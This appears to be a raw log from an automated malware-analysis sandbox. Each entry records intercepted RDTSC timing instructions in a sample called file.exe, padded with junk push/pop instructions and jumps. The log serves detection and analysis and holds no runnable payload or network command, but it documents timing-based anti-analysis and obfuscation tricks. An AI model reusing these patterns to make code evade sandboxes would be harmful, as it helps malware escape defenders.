Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407A7E second address: 1407A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407116 second address: 1407127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F0527E406h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407689 second address: 1407693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0F04CBD316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140DC3A second address: 140DC64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 jne 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0F0527E418h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140DC64 second address: 140DC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140DC68 second address: 140DC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E77D second address: 140E781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E781 second address: 140E785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E785 second address: 140E790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EA62 second address: 140EA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EA66 second address: 140EA86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F0F04CBD318h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EA86 second address: 140EA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E40Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140ECEF second address: 140ECF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F027 second address: 140F03C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0F0527E406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F03C second address: 140F04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0F04CBD316h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F04B second address: 140F068 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E413h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F312 second address: 140F320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136DF27 second address: 136DF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136DF43 second address: 136DF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136DF47 second address: 136DF4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141942E second address: 1419434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419434 second address: 141943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419721 second address: 1419740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0F04CBD316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jng 00007F0F04CBD328h 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419883 second address: 141988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141988D second address: 1419893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419893 second address: 14198A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F0527E406h 0x0000000a jne 00007F0F0527E406h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419BC7 second address: 1419BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419D1A second address: 1419D25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419FDD second address: 1419FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419FE3 second address: 141A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F0F0527E406h 0x0000000e jmp 00007F0F0527E40Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420A1D second address: 1420A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420A29 second address: 1420A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420A2E second address: 1420A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0F04CBD316h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F870 second address: 141F875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F875 second address: 141F891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0F04CBD31Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F891 second address: 141F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F8A2 second address: 141F8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F04CBD31Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F8BB second address: 141F8E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E414h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142A2A6 second address: 142A2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14371F9 second address: 14371FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14371FD second address: 143720D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0F04CBD316h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143720D second address: 1437216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1437216 second address: 143723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F04CBD316h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0F04CBD31Eh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a jns 00007F0F04CBD316h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143723F second address: 143724A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144192B second address: 144192F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144192F second address: 144193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0F0527E40Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144193D second address: 1441941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1449178 second address: 144917F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452A35 second address: 1452A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F0F04CBD316h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F04CBD321h 0x00000014 jno 00007F0F04CBD316h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452A5B second address: 1452A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0F0527E406h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452A7E second address: 1452A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451232 second address: 145123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451404 second address: 1451420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F04CBD31Ch 0x0000000d jnl 00007F0F04CBD318h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14517DA second address: 14517E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14517E3 second address: 14517FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14517FE second address: 1451804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451804 second address: 145180A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145180A second address: 145180E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145180E second address: 145183F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0F04CBD318h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007F0F04CBD31Eh 0x00000015 jp 00007F0F04CBD316h 0x0000001b push eax 0x0000001c pop eax 0x0000001d jbe 00007F0F04CBD31Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519C0 second address: 14519C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519C4 second address: 14519C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519C8 second address: 14519CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14519CE second address: 1451A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F04CBD321h 0x00000008 jp 00007F0F04CBD316h 0x0000000e jng 00007F0F04CBD316h 0x00000014 jmp 00007F0F04CBD322h 0x00000019 popad 0x0000001a jng 00007F0F04CBD335h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push edx 0x00000023 jmp 00007F0F04CBD324h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0F04CBD31Fh 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451A50 second address: 1451A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452799 second address: 14527A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14570C1 second address: 14570C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14570C6 second address: 14570E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD31Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F0F04CBD33Ah 0x00000010 jl 00007F0F04CBD31Eh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A574 second address: 145A57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0F0527E406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A57E second address: 145A587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A587 second address: 145A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145A590 second address: 145A5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1463C7D second address: 1463CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 jnp 00007F0F0527E42Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E418h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695B8 second address: 14695BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695BC second address: 14695C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695C6 second address: 14695CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14695CA second address: 14695CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1477597 second address: 14775D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F04CBD316h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F0F04CBD326h 0x00000014 jmp 00007F0F04CBD325h 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F0F04CBD316h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841C1 second address: 14841C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841C5 second address: 14841CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841CF second address: 14841F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d popad 0x0000000e je 00007F0F0527E43Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0F0527E406h 0x0000001c jnp 00007F0F0527E406h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14841F9 second address: 14841FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487AEA second address: 1487AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487AF2 second address: 1487B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD326h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487C6C second address: 1487C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487DE8 second address: 1487E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F04CBD316h 0x0000000a ja 00007F0F04CBD318h 0x00000010 jns 00007F0F04CBD322h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E02 second address: 1487E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E12 second address: 1487E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E18 second address: 1487E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487E1C second address: 1487E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0F04CBD31Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487F91 second address: 1487F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1487F9C second address: 1487FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD323h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14883E1 second address: 14883E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148869E second address: 14886B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007F0F04CBD316h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14886B3 second address: 14886D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E418h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0F0527E41Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14886D9 second address: 14886DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148A239 second address: 148A23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148A23D second address: 148A24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F0F04CBD316h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
